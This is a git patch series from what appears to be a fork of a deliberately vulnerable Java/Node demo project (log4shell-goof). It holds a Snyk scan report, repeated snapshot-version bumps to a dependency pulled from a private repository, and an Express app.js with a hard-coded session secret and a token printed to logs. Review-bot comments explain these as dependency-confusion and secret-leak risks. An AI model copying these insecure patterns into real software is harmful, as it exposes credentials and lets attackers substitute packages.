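Review bot: The repository added at the top of the client pom (`https://adolltesting.com/repository/maven-snapshots/`, followed by what appears to be `true always` as the snapshot enabled/updatePolicy values — the XML element names are stripped in this rendering) is declared next to the implicit Maven Central, and the second hunk of the same file then depends on `io.snyk:log4shell-server:0.0.1-SNAPSHOT`; Maven consults every declared repository for that coordinate, so a package with the same groupId/artifactId published to a public repository could satisfy the dependency instead of the private one. If this is deliberate as a private-dependency demo, say so in a comment beside the repository element, e.g. `<!-- demo private repository; see settings.xml for credentials -->`; otherwise route the private host through a `<mirror>` in settings.xml (which the `.gitignore` hunk in this commit already keeps out of the tree) and restrict it to the `io.snyk` group. The same repository declarations are added to the server pom in the last hunk of this commit, so the point applies there too.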
diff --git a/snyk.html b/snyk.html new file mode 100644 index 0000000000..2e3b68c5db --- /dev/null +++ b/snyk.html @@ -0,0 +1,493 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
+
+
+
+ + + Snyk - Open Source Security + + + + + + + +
+

Snyk test report

+ +

March 12th 2025, 8:38:23 pm (UTC+00:00)

+
+
+ Scanned the following path: +
    +
  • /Users/austindoll/Documents/GitHub/java-goof/pom.xml (maven)
  • +
+
+ +
+
0 known vulnerabilities
+
0 vulnerable dependency paths
+
0 dependencies
+
+
+
+
+
+ + + + + + + +
Project io.github.snyk:java-goof
Path /Users/austindoll/Documents/GitHub/java-goof
Package Manager maven
Manifest pom.xml
+
+
+ No known vulnerabilities detected. +
+
+ + + + From 60401092e270a974124ecb1b9725f7fc40d41d32 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Thu, 27 Mar 2025 12:09:36 -0400 Subject: [PATCH 24/38] fix --- log4shell-goof/log4shell-client/pom.xml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 8fdead3edc..2d37d2974d 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -7,13 +7,16 @@ 0.0.1-SNAPSHOT + - snapshots + releases Releases repo + https://adolltesting.com/repository/maven-releases/ + + + snapshots Snapshots https://adolltesting.com/repository/maven-snapshots/ - - true - always - + + log4shell-client 0.0.1-SNAPSHOT @@ -28,9 +31,6 @@ - - - io.snyk From 74376a9ac981e259bffd618e75f687645cee35eb Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Thu, 27 Mar 2025 12:55:22 -0400 Subject: [PATCH 25/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 2d37d2974d..fe276cf0fa 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.2-SNAPSHOT org.apache.logging.log4j From 313010ede42b9d91bad524a0218869801e2b019f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:17:46 -0400 Subject: [PATCH 26/38] commit --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index fe276cf0fa..2d37d2974d 100644 --- a/log4shell-goof/log4shell-client/pom.xml 
+++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.2-SNAPSHOT + 0.0.1-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index a76bf7968f..66847daffb 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.2-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From 3942b3dab6a09310d65aed1f4b69a9b7c46e950a Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:23:21 -0400 Subject: [PATCH 27/38] commit --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 2d37d2974d..e0e340361f 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.3-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index 66847daffb..da64545028 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.2-SNAPSHOT + 0.0.3-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From 070ce04692501361c799f3372ed2934cbbacaaa6 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:24:44 -0400 Subject: [PATCH 28/38] test --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index e0e340361f..9f87d249c1 100644 
--- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.3-SNAPSHOT + 0.0.5-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index da64545028..f23cf70750 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.3-SNAPSHOT + 0.0.5-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From 7ef686302897315ecab3927ed2e38490b83962b0 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:26:24 -0400 Subject: [PATCH 29/38] a --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 9f87d249c1..7e88e97c15 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.5-SNAPSHOT + 0.0.6-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index f23cf70750..c31e49261f 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.5-SNAPSHOT + 0.0.6-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From bb6bfc80c2f95100f7488faf6634f22b7fdb43d0 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:28:18 -0400 Subject: [PATCH 30/38] test --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 7e88e97c15..49de440d02 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.6-SNAPSHOT + 0.0.7-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index c31e49261f..b155b9a91a 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.6-SNAPSHOT + 0.0.7-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From dc672f2d894fa2c2d5e4a4e0504197d213274956 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:28:01 -0400 Subject: [PATCH 31/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 49de440d02..fe276cf0fa 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.7-SNAPSHOT + 0.0.2-SNAPSHOT org.apache.logging.log4j From 8e8d9225077f66b99029bac177b599a75c0c6c9b Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:30:41 -0400 Subject: [PATCH 32/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index fe276cf0fa..2d37d2974d 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.2-SNAPSHOT + 0.0.1-SNAPSHOT org.apache.logging.log4j From e6424fc715d4755564c4cff689690b38c53f4b18 Mon Sep 17 00:00:00 2001 
From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:34:45 -0400 Subject: [PATCH 33/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 2d37d2974d..b85663cbf2 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.4-SNAPSHOT org.apache.logging.log4j From 2ad70b4f03bcf1371f605e3ff000446fa4a9fcc9 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:36:44 -0400 Subject: [PATCH 34/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index b85663cbf2..9f87d249c1 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.4-SNAPSHOT + 0.0.5-SNAPSHOT org.apache.logging.log4j From 5fccc0ab70a2ca0303fa9613f16c047dac597d6a Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:39:48 -0400 Subject: [PATCH 35/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 9f87d249c1..7e88e97c15 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.5-SNAPSHOT + 0.0.6-SNAPSHOT org.apache.logging.log4j From 78ed2f28214af789b12a816ebbbfc448861f03bc Mon Sep 17 00:00:00 2001 
From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:41:54 -0400 Subject: [PATCH 36/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 7e88e97c15..49de440d02 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.6-SNAPSHOT + 0.0.7-SNAPSHOT org.apache.logging.log4j From 51a738aca01bae7488547a618ca4fead56b3df0f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:44:16 -0400 Subject: [PATCH 37/38] tre --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 49de440d02..42d2b160f1 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.7-SNAPSHOT + 0.0.9-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index b155b9a91a..79074c7890 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.7-SNAPSHOT + 0.0.9-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From c815e571cedcc6b6b7bd660e5497d6fdb3fe2a1f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 5 Aug 2025 12:31:05 -0400 Subject: [PATCH 38/38] Create app.js --- app.js | 88 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 app.js diff --git a/app.js b/app.js new file mode 100644 index 0000000000..e7dfa39ffd --- /dev/null 
+++ b/app.js 
@@ -0,0 +1,88 @@
+/**
+ * Module dependencies.
+ */
+
+// mongoose setup
+require('./mongoose-db');
+require('./typeorm-db')
+
+var st = require('st');
+var crypto = require('crypto');
+var express = require('express');
+var http = require('http');
+var path = require('path');
+var ejsEngine = require('ejs-locals');
+var bodyParser = require('body-parser');
+var session = require('express-session')
+var methodOverride = require('method-override');
+var logger = require('morgan');
+var errorHandler = require('errorhandler');
+var optional = require('optional');
+var marked = require('marked');
+var fileUpload = require('express-fileupload');
+var dust = require('dustjs-linkedin');
+var dustHelpers = require('dustjs-helpers');
+var cons = require('consolidate');
+const hbs = require('hbs')
+
+var app = express();
+var routes = require('./routes');
+var routesUsers = require('./routes/users.js')
+
+// all environments
+app.set('port', process.env.PORT || 3001);
+app.engine('ejs', ejsEngine);
+app.engine('dust', cons.dust);
+app.engine('hbs', hbs.__express);
+cons.dust.helpers = dustHelpers;
+app.set('views', path.join(__dirname, 'views'));
+app.set('view engine', 'ejs');
+app.use(logger('dev'));
+app.use(methodOverride());
+app.use(session({
+ secret: 'keyboard cat',
+ name: 'connect.sid',
+ cookie: { path: '/' }
+}))
+app.use(bodyParser.json());
+app.use(bodyParser.urlencoded({ extended: false }));
+app.use(fileUpload());
+
+// Routes
+app.use(routes.current_user);
+app.get('/', routes.index);
+app.get('/login', routes.login);
+app.post('/login', routes.loginHandler);
+app.get('/admin', routes.isLoggedIn, routes.admin);
+app.get('/account_details', routes.isLoggedIn, routes.get_account_details);
+app.post('/account_details', routes.isLoggedIn, routes.save_account_details);
+app.get('/logout', routes.logout);
+app.post('/create', routes.create);
+app.get('/destroy/:id', routes.destroy);
+app.get('/edit/:id', routes.edit);
+app.post('/update/:id', routes.update);
+app.post('/import', routes.import);
+app.get('/about_new', routes.about_new);
+app.get('/chat', routes.chat.get);
+app.put('/chat', routes.chat.add);
+app.delete('/chat', routes.chat.delete);
+app.use('/users', routesUsers)
+
+// Static
+app.use(st({ path: './public', url: '/public' }));
+
+// Add the option to output (sanitized!) markdown
+marked.setOptions({ sanitize: true });
+app.locals.marked = marked;
+
+// development only
+if (app.get('env') == 'development') {
+ app.use(errorHandler());
+}
+
+var token = 'SECRET_TOKEN_f8ed84e8f41e4146403dd4a6bbcea5e418d23a9';
+console.log('token: ' + token);
+
+http.createServer(app).listen(app.get('port'), function () {
+ console.log('Express server listening on port ' + app.get('port'));
+});
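Review bot: The session secret `'keyboard cat'` and the `token` constant are hard-coded in source, and the token is then written to stdout by `console.log('token: ' + token);`, so both land in version control and in any log aggregation; read them from the environment instead, e.g. `secret: process.env.SESSION_SECRET,`, and drop the `console.log` line. The `session()` call also sets neither `resave` nor `saveUninitialized`, for which express-session prints deprecation warnings because the defaults are unspecified, and the explicit cookie options omit `secure` and `sameSite`. The comment above `marked.setOptions({ sanitize: true });` promises sanitized output, but `sanitize` has been deprecated in marked for some time and is ignored by newer releases — confirm the installed version honours it, or sanitize the rendered HTML explicitly. Separately, `crypto`, `dust` and `optional` are required but never used, and `/destroy/:id` performs a state change on a GET without the `routes.isLoggedIn` guard used on the admin and account routes.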